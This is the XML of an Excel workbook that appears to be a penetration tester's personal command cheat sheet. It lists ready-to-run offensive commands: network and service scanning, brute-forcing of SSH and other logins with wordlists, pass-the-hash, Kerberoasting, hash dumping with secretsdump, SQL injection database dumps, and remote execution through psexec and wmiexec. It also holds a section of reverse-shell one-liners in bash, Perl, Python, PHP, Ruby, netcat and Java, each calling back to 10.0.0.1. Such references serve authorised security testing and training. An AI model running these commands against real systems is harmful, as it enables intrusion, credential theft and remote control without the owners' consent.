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hare\Mega\my_scripts\pentest_db\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{5FC74B84-D7A8-4992-BA82-E1720876BF68}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="-120" yWindow="-120" windowWidth="29040" windowHeight="15840" xr2:uid="{9699882B-201D-4814-BC6C-00623D433720}"/>
  </bookViews>
  <sheets>
    <sheet name="pentest_db" sheetId="1" r:id="rId1"/>
    <sheet name="misc" sheetId="4" r:id="rId2"/>
    <sheet name="Resources" sheetId="3" r:id="rId3"/>
  </sheets>
  <definedNames>
    <definedName name="_xlnm._FilterDatabase" localSheetId="0" hidden="1">pentest_db!$A$1:$H$255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9" i="1" l="1"/>
  <c r="I10" i="1"/>
  <c r="I11" i="1"/>
  <c r="I12" i="1"/>
  <c r="I13" i="1"/>
  <c r="I14" i="1"/>
  <c r="I15" i="1"/>
  <c r="I16" i="1"/>
  <c r="I18" i="1"/>
  <c r="I43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3" i="1"/>
  <c r="I75" i="1"/>
  <c r="I76" i="1"/>
  <c r="I78" i="1"/>
  <c r="I79" i="1"/>
  <c r="I80" i="1"/>
  <c r="I87" i="1"/>
  <c r="I88" i="1"/>
  <c r="I89" i="1"/>
  <c r="I90" i="1"/>
  <c r="I97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200" i="1"/>
  <c r="I205" i="1"/>
  <c r="I206" i="1"/>
  <c r="I207" i="1"/>
  <c r="I214" i="1"/>
  <c r="I215" i="1"/>
  <c r="I216" i="1"/>
  <c r="I221" i="1"/>
  <c r="I222" i="1"/>
  <c r="I224" i="1"/>
  <c r="I226" i="1"/>
  <c r="I227" i="1"/>
  <c r="I228" i="1"/>
  <c r="I231" i="1"/>
  <c r="I232" i="1"/>
  <c r="I233" i="1"/>
  <c r="I234" i="1"/>
  <c r="I235" i="1"/>
  <c r="I236" i="1"/>
</calcChain>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1632" uniqueCount="674">
  <si>
    <t>Tool</t>
  </si>
  <si>
    <t>Port</t>
  </si>
  <si>
    <t>Service</t>
  </si>
  <si>
    <t>Description</t>
  </si>
  <si>
    <t>Command</t>
  </si>
  <si>
    <t>Type</t>
  </si>
  <si>
    <t>Discovery</t>
  </si>
  <si>
    <t>arp-scan</t>
  </si>
  <si>
    <t>TCP</t>
  </si>
  <si>
    <t>FTP</t>
  </si>
  <si>
    <t>nmap</t>
  </si>
  <si>
    <t>SSH</t>
  </si>
  <si>
    <t>nikto</t>
  </si>
  <si>
    <t>nmap FTP scripts</t>
  </si>
  <si>
    <t>nikto against target</t>
  </si>
  <si>
    <t>Web</t>
  </si>
  <si>
    <t xml:space="preserve">arp-scan a file </t>
  </si>
  <si>
    <t>arp-scan local</t>
  </si>
  <si>
    <t>arp-scan -l</t>
  </si>
  <si>
    <t>-</t>
  </si>
  <si>
    <t>UDP</t>
  </si>
  <si>
    <t>eyewitness</t>
  </si>
  <si>
    <t>testssl</t>
  </si>
  <si>
    <t>SSL</t>
  </si>
  <si>
    <t>TestSSL on file (parallel)</t>
  </si>
  <si>
    <t>sslscan</t>
  </si>
  <si>
    <t>SSLScan on file (parallel)</t>
  </si>
  <si>
    <t>brutespray</t>
  </si>
  <si>
    <t>brutespray -f nmap.gnmap -U $USERFILE -P $PASSFILE</t>
  </si>
  <si>
    <t>brutesrpay --file nmap.xml - o brutespray</t>
  </si>
  <si>
    <t>Enumeration</t>
  </si>
  <si>
    <t>WebApp</t>
  </si>
  <si>
    <t>ssh-audit</t>
  </si>
  <si>
    <t>nmap SSH scripts</t>
  </si>
  <si>
    <t>enum4linux</t>
  </si>
  <si>
    <t>run on single</t>
  </si>
  <si>
    <t>enum4linux -a -R 490-560,900-1800 $TARGET | tee smb-enum4linux_$TARGET.txt</t>
  </si>
  <si>
    <t>SMB</t>
  </si>
  <si>
    <t>run on a file - iplist (parallel)</t>
  </si>
  <si>
    <t>aquatone</t>
  </si>
  <si>
    <t>screenshots: run on file of urls</t>
  </si>
  <si>
    <t>cutycapt</t>
  </si>
  <si>
    <t>sceenshot: single on URL</t>
  </si>
  <si>
    <t>metasploit</t>
  </si>
  <si>
    <t>nbtscan-unixwiz</t>
  </si>
  <si>
    <t>run nbtscan on a ips file (xargs)</t>
  </si>
  <si>
    <t>Netbios</t>
  </si>
  <si>
    <t>Proto</t>
  </si>
  <si>
    <t>whatweb</t>
  </si>
  <si>
    <t xml:space="preserve">whatweb $URL --aggression=3 --verbose | tee whatweb.txt </t>
  </si>
  <si>
    <t>wafw00f -v -a $URL | tee wafw00f.txt</t>
  </si>
  <si>
    <t>Check WAF on URL</t>
  </si>
  <si>
    <t>wafw00f</t>
  </si>
  <si>
    <t>hakrawler -all -depth 4 -all -usewayback -insecure -js -linkfinder -robots -sitemap -urls -url $URL | tee -a hakrawler.txt</t>
  </si>
  <si>
    <t xml:space="preserve">crawl the url </t>
  </si>
  <si>
    <t>hakrawler</t>
  </si>
  <si>
    <t>gospider</t>
  </si>
  <si>
    <t>ICMP</t>
  </si>
  <si>
    <t>icmpscan</t>
  </si>
  <si>
    <t xml:space="preserve">icmpscan ip file </t>
  </si>
  <si>
    <t>ARP</t>
  </si>
  <si>
    <t>gobuster</t>
  </si>
  <si>
    <t>ssh-audit $TARGET</t>
  </si>
  <si>
    <t xml:space="preserve">run on single </t>
  </si>
  <si>
    <t>nmap -T4 -sSV -PN -n -p22 --script="ssh* and not ssh-brute*" -oN ssh_nmap $TARGET</t>
  </si>
  <si>
    <t>nmap smb scripts - file</t>
  </si>
  <si>
    <t>Protocol Scan (-sO)</t>
  </si>
  <si>
    <t>nikto urls file (parallel)</t>
  </si>
  <si>
    <t>Brute-force</t>
  </si>
  <si>
    <t>UDP top 1k ports (-sU)</t>
  </si>
  <si>
    <t>CTF</t>
  </si>
  <si>
    <t>gobuster against wordlist</t>
  </si>
  <si>
    <t>Recon</t>
  </si>
  <si>
    <t>shodan</t>
  </si>
  <si>
    <t xml:space="preserve">TCP Full 65k (-p0- -sSV) </t>
  </si>
  <si>
    <t>65k</t>
  </si>
  <si>
    <t>top1k</t>
  </si>
  <si>
    <t xml:space="preserve">screen - TCP Full 65k (-p0- -sSV)  </t>
  </si>
  <si>
    <t>screen  -UDP top 1k ports (-sU)</t>
  </si>
  <si>
    <t>awscli</t>
  </si>
  <si>
    <t>Parse</t>
  </si>
  <si>
    <t xml:space="preserve">watch and parse running nmap screen logs </t>
  </si>
  <si>
    <t>ultimate-nmap-parser</t>
  </si>
  <si>
    <t>/tools/ultimate-nmap-parser/ultimate-nmap-parser.sh *.gnmap --all</t>
  </si>
  <si>
    <t>/tools/ultimate-nmap-parser/ultimate-nmap-parser.sh *.gnmap --summary &gt;/dev/null &amp;&amp; cat summary.txt &amp;&amp; rm summary.txt</t>
  </si>
  <si>
    <t>get current summary only *.gnmap</t>
  </si>
  <si>
    <t>parse out everything from *.gnmap</t>
  </si>
  <si>
    <t>screen -L -Logfile nmap_ping_adv.log -d -m -S nmap-ping-adv nmap -n -v --reason -PE -PM -PS21,22,23,25,26,53,80,81,110,111,113,135,139,143,179,199,443,445,465,514,548,554,587,993,995,1025,1026,1433,1720,1723,2000,2001,3306,3389,5060,5900,6001,8000,8080,8443,8888,10000,32768,49152 -PA21,80,443,13306 -oN nmap_ping_adv.nmap -iL $TARGETSFILE --excludefile=$EXCLUDESFILE</t>
  </si>
  <si>
    <t>jira-scan</t>
  </si>
  <si>
    <t xml:space="preserve">scan a JIRA instance </t>
  </si>
  <si>
    <t>jira-scan -v -i -u $URL | tee jira-scan.txt</t>
  </si>
  <si>
    <t>CMS - Jira</t>
  </si>
  <si>
    <t>webanalyze</t>
  </si>
  <si>
    <t>webanalyze -host $URL -crawl 2 -output webanalyze.txt</t>
  </si>
  <si>
    <t>fingerprint webapp technologies</t>
  </si>
  <si>
    <t xml:space="preserve">lookup ips in file on shodan </t>
  </si>
  <si>
    <t>smbmap</t>
  </si>
  <si>
    <t>icmpscan single IP</t>
  </si>
  <si>
    <t>Ping</t>
  </si>
  <si>
    <t>gcloud</t>
  </si>
  <si>
    <t>get default login via another browser</t>
  </si>
  <si>
    <t xml:space="preserve">gcloud auth application-default login --no-launch-browser </t>
  </si>
  <si>
    <t>setup aws authentication</t>
  </si>
  <si>
    <t>aws configure</t>
  </si>
  <si>
    <t>Pass the Hash</t>
  </si>
  <si>
    <t>Login with Creds</t>
  </si>
  <si>
    <t>smbclient</t>
  </si>
  <si>
    <t xml:space="preserve">Null Session </t>
  </si>
  <si>
    <t>Login with Creds and execute whoami</t>
  </si>
  <si>
    <t>Pass the Hash Login execute whoami</t>
  </si>
  <si>
    <t>crackmapexec</t>
  </si>
  <si>
    <t>NFS</t>
  </si>
  <si>
    <t>nmap scrips on nfs</t>
  </si>
  <si>
    <t xml:space="preserve">check creds work </t>
  </si>
  <si>
    <t>rdp_check</t>
  </si>
  <si>
    <t>RDP</t>
  </si>
  <si>
    <t>run nmap scripts on rdp</t>
  </si>
  <si>
    <t>DNS</t>
  </si>
  <si>
    <t>dig</t>
  </si>
  <si>
    <t>Any information</t>
  </si>
  <si>
    <t>IPv6 DNS request</t>
  </si>
  <si>
    <t>Regular DNS request</t>
  </si>
  <si>
    <t>Information</t>
  </si>
  <si>
    <t>dig ANY @&lt;DNS_IP&gt; $DOMAIN</t>
  </si>
  <si>
    <t>dig A @&lt;DNS_IP&gt; $DOMAIN</t>
  </si>
  <si>
    <t>dig AAAA @&lt;DNS_IP&gt; $DOMAIN</t>
  </si>
  <si>
    <t>Emails</t>
  </si>
  <si>
    <t>DNS that resolves that name</t>
  </si>
  <si>
    <t>Reverse lookup</t>
  </si>
  <si>
    <t>reverse IPv6 lookup</t>
  </si>
  <si>
    <t xml:space="preserve">dig axfr @&lt;DNS_IP&gt; </t>
  </si>
  <si>
    <t>Try zone transfer without domain</t>
  </si>
  <si>
    <t>Try zone transfer guessing the domain</t>
  </si>
  <si>
    <t>TCP/UDP</t>
  </si>
  <si>
    <t>Kerberos</t>
  </si>
  <si>
    <t>GetUserSPNs.py -request -dc-ip $DCIP $DOMAIN/$USER</t>
  </si>
  <si>
    <t>IKE</t>
  </si>
  <si>
    <t>Gather some info</t>
  </si>
  <si>
    <t>ike-scan</t>
  </si>
  <si>
    <t>dig TXT @&lt;DNS_IP&gt; $DOMAIN</t>
  </si>
  <si>
    <t xml:space="preserve">dig MX @&lt;DNS_IP&gt; $DOMAIN </t>
  </si>
  <si>
    <t xml:space="preserve">dig NS @&lt;DNS_IP&gt; $DOMAIN </t>
  </si>
  <si>
    <t xml:space="preserve">dig axfr @&lt;DNS_IP&gt; $DOMAIN </t>
  </si>
  <si>
    <t>Impacket</t>
  </si>
  <si>
    <t>SMTP</t>
  </si>
  <si>
    <t>use nmap to check for open relay</t>
  </si>
  <si>
    <t>nmap -T4 -sSV -n -p21 --script="ftp* and not ftp-brute*" -oA ftp_nmap -iL $TARGET</t>
  </si>
  <si>
    <t>msfconsole -q -x "spool ftp_msf.txt; setg RHOSTS file://$TARGET ;setg RPORT 21; use auxiliary/scanner/ftp/ftp_version;run;use auxiliary/scanner/ftp/anonymous; run;spool off;exit"</t>
  </si>
  <si>
    <t>FTP anonymous, version</t>
  </si>
  <si>
    <t>snmp_login</t>
  </si>
  <si>
    <t>SNMP</t>
  </si>
  <si>
    <t>msfconsole -x "spool snmp-msf-login;setg RHOSTS file://$MSFTARGET;setg RPORT 161;use auxiliary/scanner/snmp/snmp_login;set VERSION all;set PASS_LIST $COMMUNITY;set VERBOSE true;run;spool off;exit"</t>
  </si>
  <si>
    <t>fingerprint - use urls file</t>
  </si>
  <si>
    <t xml:space="preserve">ssh_version on file of </t>
  </si>
  <si>
    <t>msfconsole -x "spool snmp_msf-enum;use auxiliary/scanner/snmp/snmp_enum;setg RHOSTS $MSFTARGET;setg RPORT $PORT;set COMMUNITY $COMMUNITY;set VERBOSE true;run"</t>
  </si>
  <si>
    <t>snmp_enum</t>
  </si>
  <si>
    <t xml:space="preserve">nmap </t>
  </si>
  <si>
    <t xml:space="preserve">scripts on unqiue ports (-sC -O) </t>
  </si>
  <si>
    <t>mount -t nfs [-o vers=2] &lt;ip&gt;:&lt;remote_folder&gt; &lt;local_folder&gt; -o nolock</t>
  </si>
  <si>
    <t>mount</t>
  </si>
  <si>
    <t>mount nfs share</t>
  </si>
  <si>
    <t>hydra</t>
  </si>
  <si>
    <t>bruteforce SSH</t>
  </si>
  <si>
    <t>hydra -L $USERFILE -P $PASSFILE  ssh://$TARGET</t>
  </si>
  <si>
    <t>gobuster dir -u $URL -f -k -w $WORDLIST -o gobuster.txt -s '200,204,302,307,500,403,401' -e -q -t 15</t>
  </si>
  <si>
    <t>dirsearch</t>
  </si>
  <si>
    <t>dirsearch -L $URLFIL -w $WORDLIST -r 1 -e txt,php,html --simple-report=dirsearch.txt | tee dirsearch.log</t>
  </si>
  <si>
    <t>dirsearch for txt,php &amp; html - url file</t>
  </si>
  <si>
    <t>screen -L -Logfile nmap_tcp_scripts.log -d -m -S nmap-tcp-scripts nmap -sSVC -vvv -Pn -O -T4 -p $(cat ../parse/ports_unique.txt) -oA nmap_tcp_scripts --open -iL $TARGETS --excludefile $EXCLUDES</t>
  </si>
  <si>
    <t>hydra -L &lt;Username_list&gt; rsh://$TARGET -v -V</t>
  </si>
  <si>
    <t>RSH</t>
  </si>
  <si>
    <t>look for users</t>
  </si>
  <si>
    <t>Scanning</t>
  </si>
  <si>
    <t>https://book.hacktricks.xyz</t>
  </si>
  <si>
    <t>https://xapax.gitbooks.io/security/content/list_of_common_ports.html</t>
  </si>
  <si>
    <t>https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/</t>
  </si>
  <si>
    <t>https://github.com/frizb/OSCP-Survival-Guide</t>
  </si>
  <si>
    <t>http://www.lifeoverpentest.com/2018/02/enumeration-cheat-sheet-for-windows.html</t>
  </si>
  <si>
    <t>https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html</t>
  </si>
  <si>
    <t>https://github.com/maldevel/PenTestKit</t>
  </si>
  <si>
    <t>smb scripts</t>
  </si>
  <si>
    <t>Rustscan</t>
  </si>
  <si>
    <t>Scan the box and run scripts on open ports</t>
  </si>
  <si>
    <t>smtp-user-enum -U /usr/share/wordlists/names.txt -t $TARGET -m 150</t>
  </si>
  <si>
    <t>smtp-user-enum</t>
  </si>
  <si>
    <t>brurforce names via SMTP</t>
  </si>
  <si>
    <t>/tools/testssl.sh/testssl.sh -p -h -U -S --warnings off --hints -oL testssl.txt $URL</t>
  </si>
  <si>
    <t>sslscan --show-certificate $URL | tee sslscan.txt</t>
  </si>
  <si>
    <t>nikto -h $URL | tee nikto.txt</t>
  </si>
  <si>
    <t>HTTP scripts</t>
  </si>
  <si>
    <t>gospider -s $URL -other-source --include-subs --robots --sitemap -t 20 | tee gospider.txt</t>
  </si>
  <si>
    <t>Screenshots  - urls.txt</t>
  </si>
  <si>
    <t>sqlmap -r sqli.txt -p filter --level 5 --risk 3 --random-agent</t>
  </si>
  <si>
    <t>sqlmap</t>
  </si>
  <si>
    <t xml:space="preserve">sqlmap on a request file </t>
  </si>
  <si>
    <t>watch "cat *tcp*.log  | grep remaining | tail -1 &amp;&amp; cat *udp*.log | grep remaining | tail -1 &amp;&amp; echo "-----" &amp;&amp; cat *.log  | grep 'open port' | sort -u"</t>
  </si>
  <si>
    <t xml:space="preserve">drheader scan single $URL| tee drheader.txt </t>
  </si>
  <si>
    <t>drheader - scan http header for issues</t>
  </si>
  <si>
    <t>drheader</t>
  </si>
  <si>
    <t>hsecscan -i -u $URL -a | tee hsecscan.txt</t>
  </si>
  <si>
    <t>hsecscan</t>
  </si>
  <si>
    <t>check headers of the app</t>
  </si>
  <si>
    <t>nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 $TARGET</t>
  </si>
  <si>
    <t>rdp_check.py $DOMAIN/$USERNAME:$PASSWORD@$TARGET</t>
  </si>
  <si>
    <t>nmap --script=nfs-ls.nse,nfs-showmount.nse,nfs-status.nse -p 2049 $TARGET</t>
  </si>
  <si>
    <t xml:space="preserve">smbclient -U '$USERNAME' \\\\$TARGET\\&lt;SHARE&gt; </t>
  </si>
  <si>
    <t>smbclient -U '%' -N \\\\$TARGET\\&lt;SHARE&gt;</t>
  </si>
  <si>
    <t>icmpscan $TARGET | tee icmpscan.txt</t>
  </si>
  <si>
    <t>xargs -a $TARGETFILE  -I VAR nbtscan-unixwiz VAR | tee -a nbtscan.txt</t>
  </si>
  <si>
    <t xml:space="preserve">smbmap -H $TARGET [-P &lt;PORT&gt;] </t>
  </si>
  <si>
    <t xml:space="preserve">smbmap -u $USERNAME -p "&lt;NT&gt;:&lt;LM&gt;" -H $TARGET [-P &lt;PORT&gt;] </t>
  </si>
  <si>
    <t>smbmap -u $USERNAME  -p $PASSWORD" -H $TARGET  [-P &lt;PORT&gt;]</t>
  </si>
  <si>
    <t xml:space="preserve">crackmapexec smb $TARGET -u $USERNAME -p '$PASSWORD' -x whoami </t>
  </si>
  <si>
    <t xml:space="preserve">crackmapexec smb $TARGET  -u $USERNAME  -H &lt;NTHASH&gt; -x whoami </t>
  </si>
  <si>
    <t xml:space="preserve">dig -x $TARGET @&lt;DNS_IP&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">dig -x $TARGETV6 @&lt;DNS_IP&gt; </t>
  </si>
  <si>
    <t>ike-scan -M $TARGET</t>
  </si>
  <si>
    <t>nmap -sV -Pn -vv  -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 $TARGET</t>
  </si>
  <si>
    <t>MySQL</t>
  </si>
  <si>
    <t>nmap scripts for MySQL</t>
  </si>
  <si>
    <t>dnsrecon -d $TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml dnsrecon.xml</t>
  </si>
  <si>
    <t>Dnsrecon</t>
  </si>
  <si>
    <t>dnsrecon</t>
  </si>
  <si>
    <t>mount $TARGET:/share /mnt/nfs  -nolock</t>
  </si>
  <si>
    <t>mount -t cifs -o username=$USER,password=$PASSWORD,domain=$DOMAIN //$TARGET/share-name /mnt/cifs</t>
  </si>
  <si>
    <t>mounts the share without locking it</t>
  </si>
  <si>
    <t>sqlmap --flush session</t>
  </si>
  <si>
    <t>flush the session</t>
  </si>
  <si>
    <t>run on request file - basic enum</t>
  </si>
  <si>
    <t>sqlmap -r sqli1.txt --random-agent --tamper=space2comment,randomcase --level 5 --risk 3 --current-user -b --current-db -f --hostname --is-dba --dbs -v</t>
  </si>
  <si>
    <t>sqlmap -r sqli1.txt --random-agent  --dbms=&lt;mysql/mssql/postgres&gt;  --dbs</t>
  </si>
  <si>
    <t>enum the database</t>
  </si>
  <si>
    <t>sqlmap -r sqli1.txt --random-agent  --dbms=&lt;mysql/mssql/postgres&gt;  -D &lt;DB NAME&gt; --tables</t>
  </si>
  <si>
    <t>enum the tables of the database</t>
  </si>
  <si>
    <t xml:space="preserve">enum the contentes of the table </t>
  </si>
  <si>
    <t>sqlmap -r sqli1.txt --random-agent  --dbms=&lt;mysql/mssql/postgres&gt; -D &lt;DB NAME&gt; -T &lt;Table Name&gt; --dump</t>
  </si>
  <si>
    <t>udp-proto-scanner</t>
  </si>
  <si>
    <t>basic scan</t>
  </si>
  <si>
    <t>udp-proto-scanner.pl -f targets.txt | tee udp-proto-scanner.txt</t>
  </si>
  <si>
    <t>Kerberoasting - list of user SPNs</t>
  </si>
  <si>
    <t>arp-scan -f $TARGETFILE</t>
  </si>
  <si>
    <t>parallel --bar --eta -a $TARGETFILE 'icmpscan {} | tee -a icmpscan.txt'</t>
  </si>
  <si>
    <t>nmap -T4 PN -sO -iL $TARGETFILE -oA nmap_proto</t>
  </si>
  <si>
    <t>msfconsole -q -x "spool ssh_msf.txt; use auxiliary/scanner/ssh/ssh_version;setg RHOSTS file://$TARGETFILE; run"</t>
  </si>
  <si>
    <t>nmap -sSV -Pn -vvv -n -p139,445 --script="smb2-*,smb-double*,smb-*enum*,smb-ls,smb-os*,smb-p*,smb-s*,smb-vuln*" -iL $TARGETFILE -oA smb_nmap</t>
  </si>
  <si>
    <t>nmap -vvv --stats-every 20s -sSV -Pn -p0- -iL $TARGETFILE -oA nmap_tcp_full</t>
  </si>
  <si>
    <t>nmap -vvv --stats-every 20s -sU -Pn -n -iL $TARGETFILE -oA nmap_udp_def</t>
  </si>
  <si>
    <t>nmap -iL $TARGETFILE -v --script=smtp-open-relay -p 25</t>
  </si>
  <si>
    <t>sshuttle -r  $USER@$TARGET 10.10.10.0/24</t>
  </si>
  <si>
    <t xml:space="preserve">sshuttle </t>
  </si>
  <si>
    <t xml:space="preserve">route traffic for 10.10.10.0/24 via sshuttle tunnel </t>
  </si>
  <si>
    <t>Misc</t>
  </si>
  <si>
    <t>Windows</t>
  </si>
  <si>
    <t>secretsdump</t>
  </si>
  <si>
    <t>secretsdump.py -system $(ls | grep -i system | head -1) -ntds $(ls | grep -i ntds.dit | head -1) DOMAIN -outputfile dump-domain.txt</t>
  </si>
  <si>
    <t>dump local windows hashes</t>
  </si>
  <si>
    <t>dump cached  windows hashes</t>
  </si>
  <si>
    <t>rustscan -a $TARGET --ulimit 5000 --scan-order "Random" -- -sSV -sC -A --script=default,version,banner,vuln --script-args=unsafe=1  -O -oA nmap_tcp_script | tee rustscan.log</t>
  </si>
  <si>
    <t>nmap - supported algorithums</t>
  </si>
  <si>
    <t>nmap -p22 $TARGET --script ssh2-enum-algos</t>
  </si>
  <si>
    <t>nmap - check for weak keys</t>
  </si>
  <si>
    <t>nmap-p22 $TARGET --script ssh-hostkey --script-args ssh_hostkey=full</t>
  </si>
  <si>
    <t>nmap -p22 $TARGET --script ssh-auth-methods --script-args="ssh.user=admin</t>
  </si>
  <si>
    <t>nmap - check auth methods</t>
  </si>
  <si>
    <t>ssh -v $TARGET -o PreferredAuthentications=password</t>
  </si>
  <si>
    <t>ssh</t>
  </si>
  <si>
    <t>ssh - force auth method</t>
  </si>
  <si>
    <t>ncrack</t>
  </si>
  <si>
    <t>bruteforce SSH using ncrack</t>
  </si>
  <si>
    <t>ncrack --user user -P /usr/share/wordlists/password/rockyou.txt ssh://$TARGET</t>
  </si>
  <si>
    <t>medusa -h $TARGET -u user -P /usr/share/wordlists/password/rockyou.txt -e s -M ssh</t>
  </si>
  <si>
    <t>medusa</t>
  </si>
  <si>
    <t>bruteforce SSH using medusa</t>
  </si>
  <si>
    <t>patator ssh_login host=$TARGET port=22 user=root 0=/usr/share/metasploit-framework/data/wordlists/unix_passwords.txt password=FILE0 -x ignore:mesg='Authentication failed.'50</t>
  </si>
  <si>
    <t>bruteforce SSH using patator</t>
  </si>
  <si>
    <t>patator</t>
  </si>
  <si>
    <t>telnet $TARGET</t>
  </si>
  <si>
    <t>Fingerprint</t>
  </si>
  <si>
    <t>Telnet</t>
  </si>
  <si>
    <t>run nmap scripts on SMTP</t>
  </si>
  <si>
    <t>msfconsole -x "spool snmp-msf.txt;setg RHOSTS file://$TARGET;setg RPORT 25;use auxiliary/scanner/smtp/smtp_relay;set MAILFROM test@test.com; set MAILTO test@test.com;run"</t>
  </si>
  <si>
    <t>msf - check for open relay</t>
  </si>
  <si>
    <t>whois</t>
  </si>
  <si>
    <t>whois -h $TARGET -p 43 "domain.com"</t>
  </si>
  <si>
    <t>TFTP</t>
  </si>
  <si>
    <t>nmap enum scripts</t>
  </si>
  <si>
    <t>run whois</t>
  </si>
  <si>
    <t>nmap -p69 --script=tftp-enum $TARGET</t>
  </si>
  <si>
    <t>Finger</t>
  </si>
  <si>
    <t>finger @$TARGET</t>
  </si>
  <si>
    <t>finger - list users</t>
  </si>
  <si>
    <t>finger - get user info</t>
  </si>
  <si>
    <t xml:space="preserve">Reverse Shell </t>
  </si>
  <si>
    <t>bash -i &gt;&amp; /dev/tcp/10.0.0.1/8080 0&gt;&amp;1</t>
  </si>
  <si>
    <t>finger admin@$TARGET</t>
  </si>
  <si>
    <t>perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,"&gt;&amp;S");open(STDOUT,"&gt;&amp;S");open(STDERR,"&gt;&amp;S");exec("/bin/sh -i");};'</t>
  </si>
  <si>
    <t>Perl</t>
  </si>
  <si>
    <t xml:space="preserve">Revese Shell </t>
  </si>
  <si>
    <t>python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'</t>
  </si>
  <si>
    <t>Python</t>
  </si>
  <si>
    <t>php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3");'</t>
  </si>
  <si>
    <t>PHP</t>
  </si>
  <si>
    <t>ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i &lt;&amp;%d &gt;&amp;%d 2&gt;&amp;%d",f,f,f)'</t>
  </si>
  <si>
    <t>Ruby</t>
  </si>
  <si>
    <t>nc -e /bin/sh 10.0.0.1 1234</t>
  </si>
  <si>
    <t>Netcat</t>
  </si>
  <si>
    <t>rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc 10.0.0.1 1234 &gt;/tmp/f</t>
  </si>
  <si>
    <t>r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5&lt;&gt;/dev/tcp/10.0.0.1/2002;cat &lt;&amp;5 | while read line; do \$line 2&gt;&amp;5 &gt;&amp;5; done"] as String[])
p.waitFor()</t>
  </si>
  <si>
    <t>Java</t>
  </si>
  <si>
    <t>xterm -display 10.0.0.1:1</t>
  </si>
  <si>
    <t>Xterm</t>
  </si>
  <si>
    <t>finger-user-enum.pl -U users.txt -t $TARGET</t>
  </si>
  <si>
    <t>Finger-user-Enum</t>
  </si>
  <si>
    <t>bruteforce finger users</t>
  </si>
  <si>
    <t>nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='DOMAIN.LOCAL'" $TARGET</t>
  </si>
  <si>
    <t xml:space="preserve">enum users </t>
  </si>
  <si>
    <t>GetNPUsers.py DOMAIN-Target/ -usersfile user.txt -dc-ip &lt;IP&gt; -format hashcat/john</t>
  </si>
  <si>
    <t>Check for Kerberoasting</t>
  </si>
  <si>
    <t>impacket-GetUserSPNs &lt;domain_name&gt;/&lt;domain_user&gt;:&lt;domain_user_password&gt; -request -format &lt;AS_REP_responses_format [hashcat | john]&gt; -outputfile &lt;output_AS_REP_responses_file&gt;</t>
  </si>
  <si>
    <t>ASREPRoast - GetUserSPNs</t>
  </si>
  <si>
    <t>Details</t>
  </si>
  <si>
    <t>https://book.hacktricks.xyz/windows/active-directory-methodology/asreproast</t>
  </si>
  <si>
    <t>impacket-GetUserSPNs &lt;domain_name&gt;/ -usersfile &lt;users_file&gt; -format &lt;AS_REP_responses_format [hashcat | john]&gt; -outputfile &lt;output_AS_REP_responses_file&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">impacket-GetUserSPNs &lt;domain_name&gt;/&lt;domain_user&gt;:&lt;domain_user_password&gt; -outputfile &lt;output_TGSs_file&gt; </t>
  </si>
  <si>
    <t>Kerberoasting</t>
  </si>
  <si>
    <t>ASREPRoast - GetUserSPNs (Users File)</t>
  </si>
  <si>
    <t>python3 getTGT.py &lt;domain_name&gt;/&lt;user_name&gt; -hashes [lm_hash]:&lt;ntlm_hash&gt;</t>
  </si>
  <si>
    <t>python3 getTGT.py &lt;domain_name&gt;/&lt;user_name&gt; -aesKey &lt;aes_key&gt;</t>
  </si>
  <si>
    <t>python3 getTGT.py &lt;domain_name&gt;/&lt;user_name&gt;:[password]</t>
  </si>
  <si>
    <t>Request the TGT with hash</t>
  </si>
  <si>
    <t>If not provided, password is asked</t>
  </si>
  <si>
    <t>Request the TGT with aesKey (steal + sec)</t>
  </si>
  <si>
    <t>Cracking</t>
  </si>
  <si>
    <t>Hashcat</t>
  </si>
  <si>
    <t>hashcat -m 13100 --force &lt;TGSs_file&gt; &lt;passwords_file&gt;</t>
  </si>
  <si>
    <t>Crack TGS file using Hashcat</t>
  </si>
  <si>
    <t>john --format=krb5tgs --wordlist=&lt;passwords_file&gt; &lt;AS_REP_responses_file&gt;</t>
  </si>
  <si>
    <t>Crack TGS file using John</t>
  </si>
  <si>
    <t>python psexec.py &lt;domain_name&gt;/&lt;user_name&gt;@&lt;remote_hostname&gt; -k -no-pass</t>
  </si>
  <si>
    <t>python smbexec.py &lt;domain_name&gt;/&lt;user_name&gt;@&lt;remote_hostname&gt; -k -no-pass</t>
  </si>
  <si>
    <t>python wmiexec.py &lt;domain_name&gt;/&lt;user_name&gt;@&lt;remote_hostname&gt; -k -no-pass</t>
  </si>
  <si>
    <t>Login using PSExec</t>
  </si>
  <si>
    <t>DCOM</t>
  </si>
  <si>
    <t>Login using SMBExec</t>
  </si>
  <si>
    <t>Login using WMIExec</t>
  </si>
  <si>
    <t>https://vk9-sec.com/impacket-remote-code-execution-rce-on-windows-from-linux/</t>
  </si>
  <si>
    <t>RCE</t>
  </si>
  <si>
    <t>rpcinfo -p $TARGET</t>
  </si>
  <si>
    <t>Rpcbind</t>
